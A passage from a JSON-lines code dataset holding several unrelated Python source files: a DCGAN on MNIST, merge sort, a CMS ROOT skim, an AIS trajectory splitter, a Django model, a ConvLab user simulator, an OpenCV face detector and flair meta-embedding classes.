100\nimg_size = 28\noutput_channel = 1\n\n\nclass Generator(nn.Module):\n def __init__(self):\n super().__init__()\n\n self.init_size = (img_size // 4)\n\n self.l1 = nn.Sequential(nn.Linear(noise_size, 128 * self.init_size ** 2))\n self.conv_block = nn.Sequential(\n nn.BatchNorm2d(128),\n nn.Upsample(scale_factor=2),\n nn.Conv2d(128, 128, 3, stride=1, padding=1),\n nn.BatchNorm2d(128, 0.8),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Upsample(scale_factor=2),\n nn.Conv2d(128, 64, 3, stride=1, padding=1),\n nn.BatchNorm2d(64, 0.8),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(64, output_channel, 3, stride=1, padding=1),\n nn.Tanh()\n )\n\n def forward(self, z):\n out = self.l1(z)\n out = out.view(out.shape[0], 128, self.init_size, self.init_size)\n img = self.conv_block(out)\n\n return img\n\n\ndef disc_block(in_filters, out_filters, bn=True):\n block = [nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n\n return block\n\n\nclass Discriminator(nn.Module):\n\n def __init__(self):\n super().__init__()\n\n self.model = nn.Sequential(\n *disc_block(output_channel, 16, bn=False),\n *disc_block(16, 32),\n *disc_block(32, 64),\n *disc_block(64, 128),\n )\n\n def forward(self, img):\n out = self.model(img)\n out = out.view(out.shape[0], -1)\n\n adv_layer = nn.Sequential(nn.Linear(out.shape[1], 1),\n nn.Sigmoid())\n\n if torch.cuda.is_available():\n adv_layer.cuda()\n\n validity = adv_layer(out)\n\n return validity\n\n\ndef to_var(x):\n if torch.cuda.is_available():\n x = x.cuda()\n return Variable(x)\n\n\ndef get_noise(x_size):\n return torch.randn(x_size, noise_size)\n\n\n# Image processing\ntransform = transforms.Compose([\n transforms.Grayscale(),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n])\n\n# MNIST dataset\nmnist = datasets.MNIST(root='/tmp/',\n train=True,\n transform=transform,\n download=True)\n# Data loader\ndata_loader = torch.utils.data.DataLoader(dataset=mnist,\n batch_size=batch_size,\n shuffle=True)\n\nif torch.cuda.is_available():\n D = Discriminator().cuda()\n G = Generator().cuda()\nelse:\n D = Discriminator()\n G = Generator()\n\nbce_loss = nn.BCELoss()\nd_optimizer = torch.optim.Adam(D.parameters(), lr=0.0002)\ng_optimizer = torch.optim.Adam(G.parameters(), lr=0.0002)\n\nif torch.cuda.is_available():\n D.cuda()\n G.cuda()\n bce_loss.cuda()\n\nfor epoch in range(total_epoch):\n pbar = tqdm(data_loader)\n pbar.set_description('{}'.format(epoch))\n\n for x, _ in pbar:\n # input data\n curr_batch = x.size(0)\n x_data = to_var(x)\n sample_noise = to_var(get_noise(curr_batch))\n\n # label\n one_label = Variable(torch.ones(curr_batch, 1), requires_grad=False).cuda()\n zero_label = Variable(torch.zeros(curr_batch, 1), requires_grad=False).cuda()\n\n fake_img = G(sample_noise)\n\n # discriminator\n\n real_loss = bce_loss(D(x_data), one_label)\n fake_loss = bce_loss(D(fake_img), zero_label)\n\n d_loss = (real_loss + fake_loss) / 2\n\n d_optimizer.zero_grad()\n g_optimizer.zero_grad()\n\n d_loss.backward(retain_graph=True)\n d_optimizer.step()\n\n # generator\n\n g_loss = bce_loss(D(fake_img), one_label)\n\n g_optimizer.zero_grad()\n d_optimizer.zero_grad()\n\n g_loss.backward()\n g_optimizer.step()\n\n fake_images = fake_img.view(fake_img.size(0), 1, 28, 28)\n save_image(fake_images, '{}.png'.format(epoch), normalize=True)\n","repo_name":"yongjun823/style-to-go","sub_path":"gan/dcgan2.py","file_name":"dcgan2.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41529374798","text":" \n# [3, 1, 5, 4]\n# left = [3,1], right = [5,4]\n# left_sorted([3,1])\n# left = [3], right = [1]\n# left_sorted([3]) = [3]\n# right_sorted([1]) = [1]\n# return merge([3], [1]) => [1, 3]\n# left_sorted = [1,3]\n\n# right_sorted([5, 4])\n# left = [5], right = [4]\n# left_sorted([5]) = [5]\n# right_sorted([4]) = [4]\n# merge([5], [4]) => return [4, 5]\n# right_sorted = [4, 5]\n\n# return merged([1,3], [4,5]) => [1,3,4,5]\n\ndef merge(left,right):\n i, j = 0, 0\n lst = []\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n lst.append(left[i])\n i += 1\n else:\n lst.append(right[j])\n j += 1\n lst += left[i:]\n lst += right[j:]\n return lst\n \ndef mergesort(arr):\n if len(arr) == 1:\n return arr\n left = arr[:len(arr) // 2]\n right = arr[len(arr) // 2:]\n left_sorted = mergesort(left)\n right_sorted = mergesort(right)\n \n return merge(left_sorted, right_sorted)\n\narr = [3, 1, 5, 4]\nprint(mergesort(arr))\n","repo_name":"devemauricio/python_projects","sub_path":"mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71872855138","text":"\nimport ROOT\nROOT.gInterpreter.Declare(\"\"\"\n\nusing RVecF = ROOT::VecOps::RVec;\nusing RVecB = ROOT::VecOps::RVec;\n\ntemplate\nT DeltaR(T eta1, T phi1, T eta2, T phi2){\n const T dphi = ROOT::Math::VectorUtil::Phi_mpi_pi(phi2 - phi1);\n const T deta = eta2-eta1;\n return std::hypot(dphi, deta);\n}\n\nRVecB DeltaRMatch(const RVecF& eta1, const RVecF& phi1,\n const std::vector& eta2,\n const std::vector& phi2, float dR)\n{\n RVecB mask(eta1.size(), false);\n for(size_t idx1 = 0; idx1 < eta1.size(); ++idx1) {\n bool has_match = false;\n for(size_t col = 0; !has_match && col < eta2.size(); ++col) {\n for(size_t idx2 = 0; !has_match && idx2 < eta2[col]->size(); ++idx2) {\n has_match = DeltaR(eta1[idx1], phi1[idx1], eta2[col]->at(idx2), phi2[col]->at(idx2)) < dR;\n }\n }\n mask[idx1] = has_match;\n }\n return mask;\n}\n\"\"\")\n\ndef skim(df):\n columns = [ str(c) for c in df.GetColumnNames() ]\n ref_objects = [ ('L1Tau', '_tmp'), ('Tau', ''), ('Jet', '') ]\n for obj, suffix in ref_objects:\n df = df.Define(f'{obj}_sel', f'{obj}_pt > 15 && abs({obj}_eta) < 2.7')\n sample_c = None\n for c in columns:\n if c.startswith(obj + '_'):\n if len(suffix) > 0:\n df = df.Define(c + suffix, f'{c}[{obj}_sel]')\n else:\n df = df.Redefine(c, f'{c}[{obj}_sel]')\n sample_c = c\n counter = 'n' + obj\n if len(suffix) == 0 and sample_c and counter in columns:\n df = df.Redefine(counter, f'static_cast({sample_c}.size())')\n ref_eta = [ f'&{obj}_eta{suffix}' for obj, suffix in ref_objects ]\n ref_phi = [ f'&{obj}_phi{suffix}' for obj, suffix in ref_objects ]\n ref_eta_str = '{' + ', '.join(ref_eta) + '}'\n ref_phi_str = '{' + ', '.join(ref_phi) + '}'\n for obj in [ 'PixelTrack', 'PFCand', 'RecHitHBHE', 'RecHitEB', 'RecHitEE' ]:\n df = df.Define(f'{obj}_sel', f'DeltaRMatch({obj}_eta, {obj}_phi, {ref_eta_str}, {ref_phi_str}, 0.5f)')\n sample_c = None\n for c in columns:\n if c.startswith(obj + '_'):\n df = df.Redefine(c, f'{c}[{obj}_sel]')\n sample_c = c\n counter = 'n' + obj\n if sample_c and counter in columns:\n df = df.Redefine(counter, f'static_cast({sample_c}.size())')\n return df","repo_name":"cms-tau-pog/TauMLTools","sub_path":"Production/python/skimHLT.py","file_name":"skimHLT.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"41282777119","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n# @Time : 12/18/2018 4:12 PM \n# @Author : Xiang Chen (Richard)\n# @File : split_abnormal_ais_per_day.py \n# @Software: PyCharm\nimport glob\nimport pandas as pd\n\"\"\"\nThe split_abnorma_ais_per_day is used to split the AIS data per day. Due to the AIS devices uneven sampling\nPhenomena, using this function can split the abnormal trajectory. Before doing this, I calculate the\ndelta_heading. If the delta_heading is abnormal, it should be split from the same day AIS trajectory file.\nHere, the threshold value of delta_heading is 20. It refers to the navigational maneuvring knowledge.\n\"\"\"\ndef save_data_into_file(new_file, current_position):\n \"\"\"\n This function is used to save the split files.\n \"\"\"\n name_mmsi = int(new_file.iloc[0]['MMSI'])\n name_day = int(new_file.iloc[0]['Day'])\n new_file.to_csv('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/result/%d-%d-%d.csv'%(name_mmsi,name_day,current_position),index=False)\n\n# read the files\nfile_address = glob.glob('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/AIS_trajectory_include_delta_time_speed_heading/*.csv')\nthreshold_heading_max_value = 20\nfor file in file_address:\n file_load = pd.read_csv(file)\n delta_heading = list(file_load['delta_heading'])\n # find the abnormal trajectory points in the whole trajectory file.\n index_split = file_load[file_load.delta_heading >= threshold_heading_max_value].index.tolist()\n if len(index_split) >= 1:\n #after that, add the starting point and ending point into the split list.\n index_split.insert(0, 0)\n index_split.append(len(delta_heading))\n for i in range(0, len(index_split) - 1):\n new_file = file_load.iloc[index_split[i]:index_split[i + 1]]\n current_position = i\n save_data_into_file(new_file, current_position)\n else:\n # output the file that cannot process\n name_mmsi = int(file_load.iloc[0]['MMSI'])\n name_day = int(file_load.iloc[0]['Day'])\n file_load.to_csv('/home/ucesxc0/Scratch/output/split_abnormal_ais_trajectory_per_day/result/%d-%d.csv'%(name_mmsi,name_day),index=False)\n","repo_name":"rechardchen123/Ship_movement_classification_from_AIS","sub_path":"1.Ship_Movement_Image_Generation_Labeling/1.Process_ais_data/2.split_abnormal_ais_per_day.py","file_name":"2.split_abnormal_ais_per_day.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"34"} +{"seq_id":"19126290802","text":"#renvoie le carré d'un nombre\ndef carre(x):\n return x**2\n\n#compte le nombre de voyelles dans un texte \ndef compt_voyelles(texte):\n cpt=0\n for char in texte:\n if char in \"aeiouyAEIOUY\":\n cpt+=1\n return cpt\n\nprint(__name__)\n\nif __name__ == \"__main__\":\n print(carre(5))\n print(compt_voyelles(\"toto\"))\n\n\n","repo_name":"achouak2014/Python","sub_path":"modules/module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20168504403","text":"from __future__ import unicode_literals\nfrom django.core.urlresolvers import reverse\nfrom django.db import models\n\nclass Item(models.Model):\n\n text = models.CharField(default='', max_length=32, db_index=True)\n list = models.ForeignKey('List', default='')\n\n class Meta:\n unique_together = ('list', 'text')\n\nclass List(models.Model):\n\n def get_absolute_url(self):\n return reverse('view_list', args=[self.id])\n","repo_name":"yatindrarao/Super-Lists","sub_path":"lists/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20522949473","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport torch\nfrom convlab2.policy.vhus.util import capital\nfrom convlab2.task.multiwoz.goal_generator import GoalGenerator\nfrom convlab2.policy.vhus.multiwoz.usermanager import UserDataManager\nfrom convlab2.policy.vhus.usermodule import VHUS\nfrom convlab2.policy.vhus.vhus import UserPolicyVHUSAbstract\n\nDEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nDEFAULT_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"models\")\nDEFAULT_ARCHIVE_FILE = os.path.join(DEFAULT_DIRECTORY, \"vhus_simulator_multiwoz.zip\")\n\nclass UserPolicyVHUS(UserPolicyVHUSAbstract):\n\n def __init__(self,\n load_from_zip=False,\n archive_file=DEFAULT_ARCHIVE_FILE,\n model_file='https://huggingface.co/ConvLab/ConvLab-2_models/resolve/main/vhus_simulator_multiwoz.zip'):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), 'config.json'), 'r') as f:\n config = json.load(f)\n manager = UserDataManager()\n voc_goal_size, voc_usr_size, voc_sys_size = manager.get_voc_size()\n self.user = VHUS(config, voc_goal_size, voc_usr_size, voc_sys_size).to(device=DEVICE)\n self.goal_gen = GoalGenerator()\n self.manager = manager\n self.user.eval()\n\n if load_from_zip:\n self.load(archive_file, model_file, config['load'])\n\n def predict(self, state):\n usr_action = super().predict(state)\n return usr_action\n","repo_name":"thu-coai/ConvLab-2","sub_path":"convlab2/policy/vhus/multiwoz/vhus.py","file_name":"vhus.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":429,"dataset":"github-code","pt":"34"} +{"seq_id":"72780859939","text":"import cv2\r\nimport matplotlib.pyplot as plt\r\n\r\n#defining the classes\r\n\r\nclass FaceDetector(object):\r\n def __init__(self, xml_path):\r\n self.classifier = cv2.CascadeClassifier(xml_path)\r\n\r\n def detect(self, image, biggest_only = True) :\r\n scale_factor = 1.2\r\n min_neighbors = 5\r\n min_size = (30,30)\r\n biggest_only = True\r\n flags = cv2.CASCADE_FIND_BIGGEST_OBJECT | \\\r\n cv2.CASCADE_DO_ROUGH_SEARCH if biggest_only else \\\r\n cv2.CASCADE_SCALE_IMAGE\r\n\r\n faces_coord = self.classifier.detectMultiScale(frame, scaleFactor= scale_factor, minNeighbors = min_neighbors,\r\n minSize = min_size, flags = flags)\r\n\r\n return faces_coord\r\n\r\n\r\n#initializing the camera\r\nwebcam = cv2.VideoCapture(0)\r\nprint(webcam.isOpened())\r\n\r\n#initializing the detector\r\ndetector = FaceDetector(\"haarcascade_frontalface_default.xml\")\r\n\r\n\r\n\r\n#drawing rectangle and displaying frame\r\nwhile webcam.isOpened():\r\n _, frame = webcam.read()\r\n frame = cv2.flip(frame,1) #inverting the image\r\n faces_coord = detector.detect(frame)\r\n if len(faces_coord):\r\n for (x,y,w,h) in faces_coord:\r\n cv2.rectangle(frame, (x,y), (x+w, y+h), (150,150,0),8)\r\n \r\n cv2.imshow('Face Detector',frame)\r\n #clear_output(wait = True)\r\n \r\n #code 27 is ESC key\r\n if cv2.waitKey(20) & 0xFF ==27:\r\n break\r\n\r\n\r\n\r\n#camera release \r\nwebcam.release()\r\n","repo_name":"asarthaks/FaceRecognizer","sub_path":"Face Detector.py","file_name":"Face Detector.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"28040407422","text":"import flair\nfrom flair.embeddings import TokenEmbeddings, StackedEmbeddings, DocumentEmbeddings\nfrom flair.data import Dictionary, Token, Sentence\nfrom flair.file_utils import cached_path\nfrom flair.training_utils import log_line\n\nimport os\nimport re\nimport logging\nfrom abc import abstractmethod\nfrom collections import Counter\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import List, Union, Dict, Tuple\n\nimport hashlib\n\nimport gensim\nimport numpy as np\nimport torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\ntry:\n from bpemb import BPEmb\nexcept:\n print('Cannot import BPEmb')\n \ntry:\n from transformers import AutoTokenizer, AutoConfig, AutoModel\nexcept:\n print('Cannot import Transformers')\n\nimport torch.nn.functional as F\nfrom torch.nn import ParameterList, Parameter\nfrom torch.nn import Sequential, Linear, Conv2d, ReLU, MaxPool2d, Dropout2d\nfrom torch.nn import AdaptiveAvgPool2d, AdaptiveMaxPool2d\nfrom torch.nn import TransformerEncoderLayer, TransformerEncoder\n\nfrom src.models import EmbeddingAttention, FeatureEmbedding\n\n\nlog = logging.getLogger(\"flair\")\n\n\n\nclass AveragingBytePairEmbeddings(TokenEmbeddings):\n def __init__(\n self,\n language: str,\n dim: int = 100,\n syllables: int = 200000,\n cache_dir=Path(flair.cache_root) / \"embeddings\",\n emb_method='avg',\n ):\n \"\"\"\n Initializes BP embeddings. Constructor downloads required files if not there.\n \"\"\"\n\n if isinstance(cache_dir, str):\n cache_dir = Path(cache_dir)\n self.name: str = f\"bpe-{language}-{syllables}-{dim}\"\n self.static_embeddings = True\n self.embedder = BPEmb(lang=language, vs=syllables, dim=dim, cache_dir=cache_dir)\n\n self.emb_method = emb_method\n if self.emb_method in ['avg', 'first', 'last']:\n self.__embedding_length: int = self.embedder.emb.vector_size\n else:\n self.__embedding_length: int = self.embedder.emb.vector_size * 2\n super().__init__()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n\n for i, sentence in enumerate(sentences):\n\n for token, token_idx in zip(sentence.tokens, range(len(sentence.tokens))):\n\n if \"field\" not in self.__dict__ or self.field is None:\n word = token.text\n else:\n word = token.get_tag(self.field).value\n\n if word.strip() == \"\":\n # empty words get no embedding\n token.set_embedding(\n self.name, torch.zeros(self.embedding_length, dtype=torch.float)\n )\n else:\n # all other words get embedded\n embeddings = self.embedder.embed(word.lower())\n if self.emb_method == 'first':\n embedding = embeddings[0]\n elif self.emb_method == 'last':\n embedding = embeddings[-1]\n elif self.emb_method == 'avg':\n embedding = np.average(embeddings, axis=0)\n else:\n embedding = np.concatenate((embeddings[0], embeddings[-1]))\n token.set_embedding(\n self.name, torch.tensor(embedding, dtype=torch.float)\n )\n\n return sentences\n\n def __str__(self):\n return self.name\n\n def extra_repr(self):\n return \"model={}\".format(self.name)\n\n \nclass MetaEmbeddings(TokenEmbeddings):\n \"\"\"A stack of embeddings, used if you need to combine several different embedding types.\"\"\"\n\n def __init__(self, \n embeddings: List[TokenEmbeddings],\n use_average: bool = False,\n use_attention: bool = False,\n use_features: bool = False,\n feature_model: FeatureEmbedding = None,\n use_mapping_bias: bool = True,\n use_fixed_weights_for_att: Union[bool, List[int]] = False,\n att_hidden_size: int = 10,\n max_mapping_dim: int = -1, \n use_batch_norm: bool = True,\n use_mapping_norm: bool = False):\n \"\"\"The constructor takes a list of embeddings to be combined.\"\"\"\n super().__init__()\n\n self.embeddings = embeddings\n self.num_embeddings = len(embeddings)\n self.embedding_names = []\n\n # IMPORTANT: add embeddings as torch modules\n for i, embedding in enumerate(embeddings):\n embedding.name = f\"{str(i)}-{embedding.name}\"\n self.embedding_names.append(embedding.name)\n self.add_module(f\"list_embedding_{str(i)}\", embedding)\n\n self.name: str = \"Meta\"\n self.use_average = use_average\n self.use_attention = use_attention\n self.use_features = use_features\n self.static_embeddings: bool = not self.use_average\n\n self.__embedding_type: str = embeddings[0].embedding_type\n\n self.map_all_embeddings = False\n if max_mapping_dim > 0:\n self.__embedding_length = max_mapping_dim\n if not use_average:\n self.map_all_embeddings = True # If concatenated embeddings are mapped to a smaller size\n \n elif self.use_average: \n self.__embedding_length = max([emb.embedding_length for emb in self.embeddings])\n else:\n self.__embedding_length = sum([emb.embedding_length for emb in self.embeddings])\n \n # Add Meta-Embedding models\n if self.use_average:\n self.embedding_mappings = []\n for emb in self.embeddings:\n inp_dim = emb.embedding_length\n out_dim = self.embedding_length\n l = torch.nn.Linear(inp_dim, out_dim, bias=use_mapping_bias)\n l.to(flair.device)\n self.embedding_mappings.append(l)\n self.embedding_mappings = torch.nn.ModuleList(self.embedding_mappings)\n elif self.map_all_embeddings:\n inp_dim = sum([emb.embedding_length for emb in self.embeddings])\n self.final_embedding_mapping = torch.nn.Linear(inp_dim, self.embedding_length, \n bias=use_mapping_bias).to(flair.device)\n \n self.use_batch_norm = use_batch_norm\n if use_batch_norm:\n self.batch_norm = torch.nn.BatchNorm1d(self.embedding_length)\n \n \n self.use_mapping_norm = use_mapping_norm\n if use_mapping_norm: \n self.embedding_norms = []\n for i in range(len(self.embeddings)):\n out_dim = self.embedding_length\n l = torch.nn.LayerNorm(out_dim)\n l.to(flair.device)\n self.embedding_norms.append(l)\n self.embedding_norms = torch.nn.ModuleList(self.embedding_norms)\n \n if self.use_features:\n self.feature_model = feature_model\n self.attention = EmbeddingAttention(self.embedding_length, feature_model.embedding_length, att_hidden_size, \n self.use_average, use_fixed_weights_for_att)\n \n elif self.use_attention:\n self.attention = EmbeddingAttention(self.embedding_length, 0, att_hidden_size, \n self.use_average, use_fixed_weights_for_att)\n \n \n self.to(flair.device)\n \n log_line(log)\n log.info(f'Meta-Embedding Configuration')\n log_line(log)\n log.info(\"Embeddings:\")\n for emb in self.embeddings:\n log.info(f' - {emb.name} ({emb.embedding_length})')\n log_line(log)\n log.info(\"Parameters:\")\n log.info(f' - static_embeddings: \"{self.static_embeddings}\"')\n log.info(f' - embedding_length: \"{self.embedding_length}\"')\n log.info(f' - use_average: \"{self.use_average}\"')\n log.info(f' - use_attention: \"{self.use_attention}\"')\n log.info(f' - use_features: \"{self.use_features}\"')\n log.info(f' - use_mapping_bias: \"{use_mapping_bias}\"')\n log.info(f' - att_hidden_size: \"{att_hidden_size}\"')\n log.info(f' - use_fixed_weights_for_att: \"{use_fixed_weights_for_att}\"')\n log.info(f' - use_batch_norm: \"{use_batch_norm}\"')\n log.info(f' - use_mapping_norm: \"{use_mapping_norm}\"')\n log.info(f' - map_all_embeddings: \"{self.map_all_embeddings}\"')\n log_line(log)\n \n def forward(self, \n sentences: Union[Sentence, List[Sentence]],\n return_mapped_embeddings: bool = False,\n return_weights: bool = False):\n #self.embed(sentences)\n \n if type(sentences) is Sentence:\n sentences = [sentences]\n\n lengths: List[int] = [len(sentence.tokens) for sentence in sentences]\n longest_token_sequence_in_batch: int = max(lengths)\n\n if self.use_average:\n emb_size = self.embedding_length * longest_token_sequence_in_batch * self.num_embeddings\n else:\n emb_size = self.embedding_length * longest_token_sequence_in_batch\n pre_allocated_zero_tensor = torch.zeros(\n emb_size,\n dtype=torch.float,\n device=flair.device,\n )\n\n all_embs: List[torch.Tensor] = list()\n for sentence in sentences:\n nb_padding_tokens = longest_token_sequence_in_batch - len(sentence)\n \n if self.use_average:\n for token in sentence:\n for i, emb in enumerate(token.get_each_embedding(self.embedding_names)):\n all_embs.append(self.embedding_mappings[i](emb))\n #all_embs.append(token_embs) \n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens * self.num_embeddings\n ]\n all_embs.append(t)\n \n elif self.map_all_embeddings: # for concatenation with mapping to smaller size\n for token in sentence:\n #torch.zeros(self.embedding_length * self.num_embeddings)\n token_embs: List[torch.Tensor] = list()\n for i, emb in enumerate(token.get_each_embedding(self.embedding_names)):\n token_embs.append(emb)\n token_embs = torch.cat(token_embs)\n token_embs = self.final_embedding_mapping(token_embs)\n all_embs.append(token_embs) \n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens\n ]\n all_embs.append(t)\n \n else: # for concatenation\n all_embs += [\n emb for token in sentence for emb in token.get_each_embedding(self.embedding_names)\n ]\n \n if nb_padding_tokens > 0:\n t = pre_allocated_zero_tensor[\n : self.embedding_length * nb_padding_tokens\n ]\n all_embs.append(t)\n\n if self.use_average:\n att_inp = torch.cat(all_embs).view(\n [\n len(sentences),\n longest_token_sequence_in_batch,\n self.num_embeddings,\n self.embedding_length,\n ]\n )\n \n if return_mapped_embeddings:\n mapped_embeddings = [t.squeeze(2) for t in torch.chunk(att_inp, self.num_embeddings, dim=2)]\n return mapped_embeddings\n \n if self.use_mapping_norm:\n mapped = [t.squeeze(2) for t in torch.chunk(att_inp, self.num_embeddings, dim=2)]\n normalized = [self.embedding_norms[i](emb) for i, emb in enumerate(mapped)]\n att_inp = torch.stack(normalized, dim=2)\n \n ## apply attention\n if self.use_features:\n feature_tensor = self.feature_model(sentences, (len(sentences), longest_token_sequence_in_batch))\n feature_tensor = feature_tensor.transpose_(0, 1)\n feature_inp = torch.stack([feature_tensor for x in range(self.num_embeddings)], dim=2)\n sentence_tensor, weights = self.attention(att_inp, feature_inp)\n elif self.use_attention:\n sentence_tensor, weights = self.attention(att_inp, None)\n else:\n sentence_tensor = torch.sum(att_inp, dim=2)\n \n if return_weights:\n return weights\n \n \n \n else: \n sentence_tensor = torch.cat(all_embs).view(\n [\n len(sentences),\n longest_token_sequence_in_batch,\n self.embedding_length,\n ]\n )\n \n if self.use_batch_norm and len(sentences) > 1:\n sentence_tensor = sentence_tensor.view(len(sentences) * longest_token_sequence_in_batch, self.embedding_length)\n sentence_tensor = self.batch_norm(sentence_tensor)\n sentence_tensor = sentence_tensor.view(len(sentences), longest_token_sequence_in_batch, self.embedding_length)\n \n return sentence_tensor\n\n def embed(\n self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True\n ):\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n \n self._add_embeddings_internal(sentences)\n\n def embed_internal_embeddings(\n self, sentences: Union[Sentence, List[Sentence]], static_embeddings: bool = True\n ):\n # if only one sentence is passed, convert to list of sentence\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n for embedding in self.embeddings:\n embedding.embed(sentences)\n\n @property\n def embedding_type(self) -> str:\n return self.__embedding_type\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: List[Sentence]) -> List[Sentence]:\n for embedding in self.embeddings:\n embedding._add_embeddings_internal(sentences)\n \n sentence_tensor = self.forward(sentences)\n for sid, sent in enumerate(sentences):\n for tid, token in enumerate(sent):\n token.set_embedding(self.name, sentence_tensor[sid][tid])\n\n return sentences\n \n def get_names(self) -> List[str]:\n \"\"\"Returns a list of embedding names. In most cases, it is just a list with one item, namely the name of\n this embedding. But in some cases, the embedding is made up by different embeddings (StackedEmbedding).\n Then, the list contains the names of all embeddings in the stack.\"\"\"\n return [self.name]\n\n def __str__(self):\n return f'MetaEmbeddings [{\",\".join([str(e) for e in self.embeddings])}]'\n\n def get_named_embeddings_dict(self) -> Dict:\n named_embeddings_dict = {}\n for embedding in self.embeddings:\n named_embeddings_dict.update(embedding.get_named_embeddings_dict())\n\n return named_embeddings_dict\n\n \nclass DocumentRNNEmbeddings(DocumentEmbeddings):\n def __init__(\n self,\n embeddings: List[TokenEmbeddings],\n hidden_size=128,\n rnn_layers=1,\n reproject_words: bool = False,\n reproject_words_dimension: int = None,\n bidirectional: bool = False,\n dropout: float = 0.5,\n word_dropout: float = 0.0,\n locked_dropout: float = 0.0,\n rnn_type=\"GRU\",\n fine_tune: bool = True,\n ):\n \"\"\"The constructor takes a list of embeddings to be combined.\n We changed the embeddings to support our MetaEmbeddings.\n :param embeddings: a list of token embeddings\n :param hidden_size: the number of hidden states in the rnn\n :param rnn_layers: the number of layers for the rnn\n :param reproject_words: boolean value, indicating whether to reproject the token embeddings in a separate linear\n layer before putting them into the rnn or not\n :param reproject_words_dimension: output dimension of reprojecting token embeddings. If None the same output\n dimension as before will be taken.\n :param bidirectional: boolean value, indicating whether to use a bidirectional rnn or not\n :param dropout: the dropout value to be used\n :param word_dropout: the word dropout value to be used, if 0.0 word dropout is not used\n :param locked_dropout: the locked dropout value to be used, if 0.0 locked dropout is not used\n :param rnn_type: 'GRU' or 'LSTM'\n \"\"\"\n super().__init__()\n\n #self.embeddings: StackedEmbeddings = StackedEmbeddings(embeddings=embeddings)\n self.embeddings = embeddings\n\n self.rnn_type = rnn_type\n\n self.reproject_words = reproject_words\n self.bidirectional = bidirectional\n\n self.length_of_all_token_embeddings: int = self.embeddings.embedding_length\n\n self.static_embeddings = False if fine_tune else True\n\n self.__embedding_length: int = hidden_size\n if self.bidirectional:\n self.__embedding_length *= 4\n\n self.embeddings_dimension: int = self.length_of_all_token_embeddings\n if self.reproject_words and reproject_words_dimension is not None:\n self.embeddings_dimension = reproject_words_dimension\n\n self.word_reprojection_map = torch.nn.Linear(\n self.length_of_all_token_embeddings, self.embeddings_dimension\n )\n\n # bidirectional RNN on top of embedding layer\n if rnn_type == \"LSTM\":\n self.rnn = torch.nn.LSTM(\n self.embeddings_dimension,\n hidden_size,\n num_layers=rnn_layers,\n bidirectional=self.bidirectional,\n batch_first=True,\n )\n else:\n self.rnn = torch.nn.GRU(\n self.embeddings_dimension,\n hidden_size,\n num_layers=rnn_layers,\n bidirectional=self.bidirectional,\n batch_first=True,\n )\n\n self.name = \"document_\" + self.rnn._get_name()\n\n # dropouts\n self.dropout = torch.nn.Dropout(dropout) if dropout > 0.0 else None\n self.locked_dropout = (\n LockedDropout(locked_dropout) if locked_dropout > 0.0 else None\n )\n self.word_dropout = WordDropout(word_dropout) if word_dropout > 0.0 else None\n\n torch.nn.init.xavier_uniform_(self.word_reprojection_map.weight)\n\n self.to(flair.device)\n\n self.eval()\n\n @property\n def embedding_length(self) -> int:\n return self.__embedding_length\n\n def _add_embeddings_internal(self, sentences: Union[List[Sentence], Sentence]):\n \"\"\"Add embeddings to all sentences in the given list of sentences. If embeddings are already added, update\n only if embeddings are non-static.\"\"\"\n\n # TODO: remove in future versions\n if not hasattr(self, \"locked_dropout\"):\n self.locked_dropout = None\n if not hasattr(self, \"word_dropout\"):\n self.word_dropout = None\n\n if type(sentences) is Sentence:\n sentences = [sentences]\n\n #self.rnn.zero_grad()\n\n # embed words in the sentence\n lengths: List[int] = [len(sentence.tokens) for sentence in sentences]\n longest_token_sequence_in_batch: int = max(lengths)\n \n self.embeddings.embed_internal_embeddings(sentences)\n sentence_tensor = self.embeddings(sentences)\n\n # before-RNN dropout\n if self.dropout:\n sentence_tensor = 